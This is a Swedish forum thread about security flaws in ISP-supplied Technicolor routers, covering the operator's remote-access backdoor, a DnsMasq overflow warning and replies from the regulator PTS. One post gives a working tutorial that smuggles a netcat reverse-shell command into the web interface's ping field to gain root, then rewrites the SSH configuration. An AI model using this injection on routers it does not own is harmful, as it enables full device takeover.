Säkerhetshål i BBB Technicolor TG799vacXTREAM router, DnsMasq heap buffer overflow vulnerability, Severity:High

Trädvy Permalänk
Medlem
Plats
Västra Götaland
Registrerad
Okt 2016

@Paddanx: Har inte råd . Fast jag tycker routern är bra om man vet hur man ställer in den.

Har frågat telia vilka som har tillgång till ip-nummret som går vidare till dom, svaret var hela supporten. Ett par tusen personer + belgiska supporten hos technicolor - ofta dom har koll på alla dessa människor, finns säkert flertalet som infiltrerar ens nät.

@Zensig minst sagt Inte nog med det, opkg är installerat också och kollar man i /etc/opkg.conf så hämtas packages från: https://archive.openwrt.org/snapshots/trunk/brcm63xx/generic/... och man installerar dessa via 'opkg install url/to/ipk" . Kolla in verktygen på den listam, rätt mycket fina verktyg för att snoka på ens nätverk.

@Uzanar Precis, det stämmer det du skriver att det är till för support.

Trädvy Permalänk
Medlem
Plats
Malmö
Registrerad
Maj 2014
Skrivet av wuseman:

@Paddanx: Har inte råd . Fast jag tycker routern är bra om man vet hur man ställer in den.

Fick köpa en beg Cisco Small Bussiness router för typ 1,5 år sedan samt 2 Zyxel APs... allt för 1000kr. De var ca 1 år gamla. Kunde inte låta bli, och de har varit bergstabila sedan installation och senaste uppdatering (för ca 3 mån sedan i Wifin).

Även vettiga ASUS routrar kan du om du vet hur, ställa in vettigt, med bra firmware (utom kanske Wifi).

För mig är det en fråga om... varför ens ta en risk att ha detta hål, support eller inte. Jag kan konfigurera min sida av nätverket. Jag behöver inte att de ska in och pilla med min utrustning, på min sida. Så det skulle aldrig i min vildaste fantasi falla mig in att ens använda dessa routrar, då man inte vet vad som sker. Men jag ska behöva gå in och pilla med superusers för att "stänga det"?

Är lite som att byta lås på dörren hemma. Varför skulle man inte byta det till ett man vet ingen annan har?
Har förra ägarna det? Har bostadsrättsföreningen den? Har rörläggaren som skulle fixa toaletten den? Elektrikern du anlitar då och då har väl en? Vem tänker så?

Hade man haft ett hårdvaruskydd. Tex en nyckel eller något som var tvunget att fysiskt "sättas in" i routern för att någon skulle kunna komma åt den supportmässigt, hade det varit bättre design. Du kan sätta nyckeln så den har en hållare i routern, men den måste vridas för att BBB/Telia mfl ska kunna logga in. Då vet du att du ger dem access. Och du kan då designa den så att när nyckeln inte är i, kan ingen komma åt den. (Eller ja... ingen planerad iaf, 100% säker kan man inte vara)

Trädvy Permalänk
Medlem
Registrerad
Okt 2003

Farsan har denna router (bredbandet och routern ingår i hyran).

Kan jag köpa en säkrare router och bara byta? eller är bredbandet låst till denna osäkra dynga?

Om det går att byta, vad ska man köpa? (en router som inte har detta säkerhetsproblem).

XripperX

Trädvy Permalänk
Medlem
Plats
Västra Götaland
Registrerad
Okt 2016
Skrivet av XripperX:

Farsan har denna router (bredbandet och routern ingår i hyran).

Kan jag köpa en säkrare router och bara byta? eller är bredbandet låst till denna osäkra dynga?

Om det går att byta, vad ska man köpa? (en router som inte har detta säkerhetsproblem).

Du kan köpa en ny router till farsan den är inte låst till operatören, har han TV via internet så får du brygga routern annars är det bara att byta.

Mvh

Skickades från m.sweclockers.com

Trädvy Permalänk
Medlem
Plats
at home
Registrerad
Nov 2007

Jo nu kanske det är trevligt att ha en router som platsar i uptime-tråden

Allvarligt, har ingen pratat IRL med BBB och krävt ett djupare svar? (mer än 1:a linjen)

ASUS K56CB i7, W10.
HTC 10 ICE InsertCoin SVN, Nougat
ASUS Transformer Prime 32GB, Nougat :)
Ubiquiti Edge Lite, UniFi AP-AC-Lite (AP) samt ASUSAC68U och N66U (AP), fiber 250/100Mbit/s.
Mitt nätverk: http://imgur.com/VYJjrzL Bild http://imgur.com/89WYq81

Trädvy Permalänk
Medlem
Registrerad
Okt 2003

Jag får detta fel på farsans BBB router och på min D-link 860L. "DnsMasq heap buffer overflow vulnerability"

Är detta WPA2crack relaterat eller någon annan "säkerhetsrisk"?

Det börjar bli mycket elände nu meltdown , Spectre WPA2crack osv....

XripperX

Trädvy Permalänk
Medlem
Plats
at home
Registrerad
Nov 2007

Kan du beskriva det bättre hur du ser detta fel?

Senaste firmware?

ASUS K56CB i7, W10.
HTC 10 ICE InsertCoin SVN, Nougat
ASUS Transformer Prime 32GB, Nougat :)
Ubiquiti Edge Lite, UniFi AP-AC-Lite (AP) samt ASUSAC68U och N66U (AP), fiber 250/100Mbit/s.
Mitt nätverk: http://imgur.com/VYJjrzL Bild http://imgur.com/89WYq81

Trädvy Permalänk
Medlem
Registrerad
Okt 2003

@plunn:

Avast wifi test, har senaste firmware på d-link och farsan bbb router är låst.

XripperX

Trädvy Permalänk
Medlem
Plats
at home
Registrerad
Nov 2007

@XripperX: Jo då får du väl plåga BBB och slå dig igenom 1:a linjens mediokra support.

Sen efter Telenors övertagande så kanske det inte är möjligt? Surfa EU-Thailand is the mission

ASUS K56CB i7, W10.
HTC 10 ICE InsertCoin SVN, Nougat
ASUS Transformer Prime 32GB, Nougat :)
Ubiquiti Edge Lite, UniFi AP-AC-Lite (AP) samt ASUSAC68U och N66U (AP), fiber 250/100Mbit/s.
Mitt nätverk: http://imgur.com/VYJjrzL Bild http://imgur.com/89WYq81

Trädvy Permalänk
Medlem
Registrerad
Okt 2003

Svar från PTS

Fick följande 2 svar från PTS. Första (längst ner) tolka jag som att de inte direkt brydde sig om kundfrågor. Andra mailsvaret verkar iaf lite mer lovande. Vi får se.

"VB: Sårbarhet i BBB/Telias kundroutrar som inte åtgärdas! - Löpnummer K18-16604
Konsument <konsument@pts.se>
Yesterday, 7:54 AM
Hej,
Nätsäkerhetsavdelningen på PTS tackar för informationen och undersöker de rapporterade sårbarheterna vidare.

Hör gärna av dig igen om du har fler frågor!
Med vänlig hälsning
Nomie på PTS tipsfunktion
_________________________________
Post- och telestyrelsen (PTS)
Avdelningen för Samhällsfrågor
Enheten för konsumenträttigheter
www.pts.se

Vad gör PTS?
PTS är den myndighet som har ansvar för området elektronisk kommunikation. Vi har regeringens uppdrag att följa utvecklingen på bland annat Internet- och teleområdena. Myndigheten sammanställer statistik över konsumenternas problem på dessa områden. Statistiken ger oss värdefull information om hur marknaden fungerar, och redovisas årligen. PTS kan i vissa fall ingripa om ett företag bryter mot bestämmelserna i lagen om elektronisk kommunikation. PTS kan dock inte ingripa i tvister mellan enskilda och företag.
Konsument <konsument@pts.se>

Wed 21/03, 7:36 AM
Hej,

Tack för din fråga. Vi på PTS har stor nytta av frågor och synpunkter från allmänheten eftersom de hjälper oss att följa utvecklingen på marknaden för elektronisk kommunikation. PTS är en central förvaltningsmyndighet som har ett samlat ansvar, sektorsansvar, inom området för elektronisk kommunikation. Inom ramen för detta ansvar ska PTS bl.a. utöva tillsyn enligt lagen (2003:389) om elektronisk kommunikation (LEK).

PTS behandlar inte enskilda abonnenters klagomål. I de fall klagomål från ett flertal abonnenter ger PTS anledning att förmoda att generella problem föreligger på marknaden, eller att ett företag bryter mot bestämmelserna i lagen kan klagomålen leda till tillsynsåtgärder från PTS sida.

I lagen finns krav på att operatörerna ska vidta tekniska och
organisatoriska åtgärder för att skydda de uppgifter de behandlar. Hur hög
skyddsnivå de ska uppnå beror på risken för integritetsincidenter, vilken
teknik som finns tillgänglig och vad det kostar att genomföra åtgärderna. PTS
har utfärdat föreskrifter som innehåller mer detaljerade krav på
säkerhetsåtgärder. PTSFS 2014:1 gäller för
alla elektroniska kommunikationstjänster.

Konsumentinformation
om internetsäkerhetsfrågor, liksom frågor om IT-säkerhet i hemmet, hanteras
inte av PTS utan av MSB (Myndigheten för samhällsskydd och beredskap).

Telefonväxel:
0771-240 240.

Om man är missnöjd med en operatör ska man i första hand kontakta operatören. Om detta inte hjälper kan man vända sig till Telekområdgivarna, www.telekomradgivarna.se, tel. 08-522 767 00, vardagar kl. 9-12, eller till Konsumentvägledningen i kommunen om det finns en sådan där man bor, http://www.hallakonsument.se/sok-din-kommuns-konsumentverksam.... Om det inte finns en konsumentvägledare i din kommun så kan du kontakta Hallå konsument som är Konsumentverkets konsumentrådgivning, du kan besöka deras webbplats där det även finns en chattfunktion eller ange ditt telefonnummer för att bli uppringd, http://www.hallakonsument.se/ eller ringa dem på telefonnummer 0771-525 525 vardagar mellan 9-17. Kan tvisten ändå inte lösas kan man vända sig till Allmänna reklamationsnämnden, ARN, www.arn.se för att få tvisten löst.

Om du har ingått ett avtal i egenskap av företagare gäller inte konsumenträttslig lagstiftning. Frågor om företagsabonnemang faller utanför Telekområdgivarnas uppdrag. Undantaget är klagomål som rör Telekområdgivarnas uppföranderegler för enskilda firmor.

Hör gärna av dig igen om du har fler frågor!
Med vänlig hälsning
Nomie på PTS tipsfunktion
_________________________________
Post- och telestyrelsen (PTS)
Avdelningen för Samhällsfrågor
Enheten för konsumenträttigheter
www.pts.se

Vad gör PTS?
PTS är den myndighet som har ansvar för området elektronisk kommunikation. Vi har regeringens uppdrag att följa utvecklingen på bland annat Internet- och teleområdena. Myndigheten sammanställer statistik över konsumenternas problem på dessa områden. Statistiken ger oss värdefull information om hur marknaden fungerar, och redovisas årligen. PTS kan i vissa fall ingripa om ett företag bryter mot bestämmelserna i lagen om elektronisk kommunikation. PTS kan dock inte ingripa i tvister mellan enskilda och företag."

Trädvy Permalänk
Medlem
Plats
Inomhus
Registrerad
Dec 2004

Har en Technicolor från Telia. Fortfarande v 2.75 trots att sårbarheten varit känd över en månad, och trots att v 2.78 släpptes redan i oktober 2017.

En riktig skräprouter som ofta tappar eller får fel på wifi och måste startas om för att fungera. Ska bli så skönt att få fiber indragen om några veckor.

Trädvy Permalänk
Medlem
Plats
Malmö
Registrerad
Feb 2007

Rolig tråd att läsa . Men först kanske man skall klargöra två saker:

1. Det som står i villkoren är det som gäller. Tro och tycke finns inte där, i alla fall inte till konsumentens fördel. Man läser väl villkoren innan man ingår ett avtal?

2. Eventuella brottsliga handlingar ansvarar brottslingen för, inte någon annan. I Sverige är man inte ansvarig för någon annans handlingar än sina egna förutom som målsman för minderåriga. Om någon postar en bomb till dig eller vitt pulver så är väl inte t.ex. PostNord ansvariga för det när bostaden sprängs i luften tillsammans med spädbarnet, kärringen samt hunden?

Grundregel för felsökning: Bryt och begränsa.

Trädvy Permalänk
Medlem
Registrerad
Okt 2003

Men om någon "fildelar" på ens lina via detta "säkerhetshål", och man på sådant sätt får "hotbrev" från trolladvokater.

Vem är ansvarig?, och hur bevisar man att detta är BBB fel (tar inte sitt säkerhetsansvar).

XripperX

Trädvy Permalänk
Medlem
Plats
Malmö
Registrerad
Feb 2007

Majoriteten människor är lekmän på området. Dom behöver inte bevisa något, bevisbördan ligger hos den som anklagar. Har Du inte fildelat så säger Du detta vid förhöret.

Grundregel för felsökning: Bryt och begränsa.

Trädvy Permalänk
Medlem
Plats
Gotland
Registrerad
Apr 2013
Skrivet av Caernoga:

Har en Technicolor från Telia. Fortfarande v 2.75 trots att sårbarheten varit känd över en månad, och trots att v 2.78 släpptes redan i oktober 2017.

En riktig skräprouter som ofta tappar eller får fel på wifi och måste startas om för att fungera. Ska bli så skönt att få fiber indragen om några veckor.

Slå av wifin skaffa en riktig ap. Inga problem med den routern annars, den routar trafiken precis som den skall!

Trädvy Permalänk
Medlem
Plats
Inomhus
Registrerad
Dec 2004

@Gaist: Fast som konsument ska man kunna kräva att utrustningen man köper faktiskt fungerar som utlovat, och inte behöva köpa extragrejor och konfigurera en massa. Betänk tex Agda, 72, som bara vill kunna se på tv och facetima med barnbarnen. Kunskapsnivån på Sweclockers ligger skyhögt över gemene mans.

Trädvy Permalänk
Medlem
Registrerad
Dec 2011

@wuseman - Jag skulle väldigt gärna ta del av hur du hackat routern? Driver mig t vansinne att inte kunna ändra dns i eländet när man köpt smart dns proxy o allt..? Vissa saker funkar ju utan att ändra i routern men ex chromecast är inte lätt att ändra dns på…

Skrivet av wuseman:

Du kan köpa en ny router till farsan den är inte låst till operatören, har han TV via internet så får du brygga routern annars är det bara att byta.

Mvh

Skickades från m.sweclockers.com

Glömde lite detaljer
Trädvy Permalänk
Medlem
Plats
Västra Götaland
Registrerad
Okt 2016

Sorry, inte varit inloggad på ett tag och fått lite meddelanden av några som vill ta sig in i sin router så jag försöker sätta ihop en enkel tutorial här. Brukar inte skriva tutorials direkt så det blir som det blir, lets go!

Detta fungerar till v16.2 Jade, telias nuvarande version. Har du 17.x och vill nedgradera dig igen så pma så skickar jag ett tool för att nedgradera din firmware.

Client side:
1. Dra hem en valfri linux dist och installera netcat om det inte finns förinstallerat.
- Finns säkert till powershell också skulle jag tro om man kör Windows.
2. Kör igång en netcat listener på följande vis
root@sweclockers $ nc -lvvp 1337
listening on [any] 1337 ...

-
3. Logga in på http://192.168.1.1 eller http://dlsdevice.lan
2. Klicka på advanced setup
3. Klicka på inställningar för: Diagnostics Ping&Trace
4. I ping rutan skriv:
:::::::;nc 192.168.1.x 1337 -e /bin/sh (naturligtvis ip-nummret till din maskin som har netcat igång på port 1337)

The magic is now done, you're in!

sh-4.4# nc -lvvp 1337
listening on [any] 1337 ...
connect to [192.168.1.104] from router [192.168.1.1] 35835

- Nu börjar det roliga.

Går igenom det viktigaste annars får jag sitta hela natten då det finns otroligt mycket att ställa in och leka med.

Byt root password:
skriv 'passwd' när du ser att du är ansluten.

Spana in operatörens setup för att bevittna deras backdoor med egna ögon:
cat /etc/config/dropbear

Denna config vill vi editera, hanterar du vi/vim så är de bara att editera 'vim /etc/config/dropbear'
Är du inte van med vim så använd sed bara för att editera configen:

Ändra operatörens settings till off och 0 eller kommenetera ut deras settings bara genom att skriv:
sed -i '1,18 s/^/#/' /etc/config/dropbear
sed -i '20s/off/on/' /etc/config/dropbear; sed -i '21s/off/on/' /etc/config/dropbear; sed -i '24s/0/1/' /etc/config/dropbear

Bör se ut något såhär:

Reboota inte ännu
Starta om dropbear genom att skriva
/etc/init.d/dropbear restart

ssh:a in till routern så är du inne och ser deras welcome message:

-

Härifrån kan du ändra precis ALLT, bridge mode, dns modes, serie nummer, yeah you name it! Men det tar vi en annan gång, för att installera paket använd opkg. /bin/opkg

/bin/opkg list-installed # för att lista telias & technicolors förinstallerade skit
/bin/opkg update # för att hämta en uppdaterad package list
/bin/opkg install package # för att installera paket
/bin/opkg search package # för att söka efter paket.

http://pkg.entware.net/binaries/armv5/ är vad som är inställt från fabrik, vill du lägga till fler källor så är det i /etc/opkg.conf det skall läggas till.

root@OpenWrt:~# cat /etc/opkg.conf .
src/gz packages http://pkg.entware.net/binaries/armv5
dest root /
dest ram /opt/tmp
lists_dir ext /opt/var/opkg-lists
option tmp_dir /opt/tmp

- Ni kan även lägga till massa funktioner som openvpn, ändra sync tider, fixa usb sharing som har varit blockerat tidigare. Ja precis allt som man skall kunna göra helt enkelt.

Lycka till!

Edit: Ja just, vill du inte ha password auth tillåten så är det dropbear som gäller, bara installera dropbear på valfri dist:

Generera din nyckel genom att skriva:
dropbearkey -t rsa -f /etc/dropbear/authorized_keys -s 4096

Följt av:
ssh root@192.168.1.1 "tee -a /etc/dropbear/authorized_keys" < ~/.ssh/id_rsa.pub

Du kan nu reboota routern genom att skriva 'reboot' när du ställt in allt.

Dropbear kommer vara igång från boot om du ställt in dropbear rätt.

Nu är det bara att ansluta utan password i framtiden från din maskin.

// wuseman

Trädvy Permalänk
Medlem
Plats
Västra Götaland
Registrerad
Okt 2016
Skrivet av fireplayer:

@wuseman - Jag skulle väldigt gärna ta del av hur du hackat routern? Driver mig t vansinne att inte kunna ändra dns i eländet när man köpt smart dns proxy o allt..? Vissa saker funkar ju utan att ändra i routern men ex chromecast är inte lätt att ändra dns på…

Denna länken kan komma till stor hjälp om du kommer in i routern:

https://support.unlocator.com/customer/portal/articles/128481...

Trädvy Permalänk
Medlem
Registrerad
Okt 2003

@wuseman: Tack så mycket! Tragiskt att man skall behöva hacka sin router för att leverantören som låst den inte tar sitt ansvar!

Trädvy Permalänk
Medlem
Registrerad
Okt 2003

Det här är fan en skandal, varför tar inte BBB sitt djävla ansvar?

Vad innebär detta "fel"? DnsMasq heap buffer overflow vulnerability. (har detta med WPA2 CRACK i oktober 2017 att göra?)

XripperX

Trädvy Permalänk
Medlem
Registrerad
Okt 2003

Jag körde ett nytt test på farsans router och nu får jag inga "varningar" alls, kan det vara så att BBB har fixat problemet ?

XripperX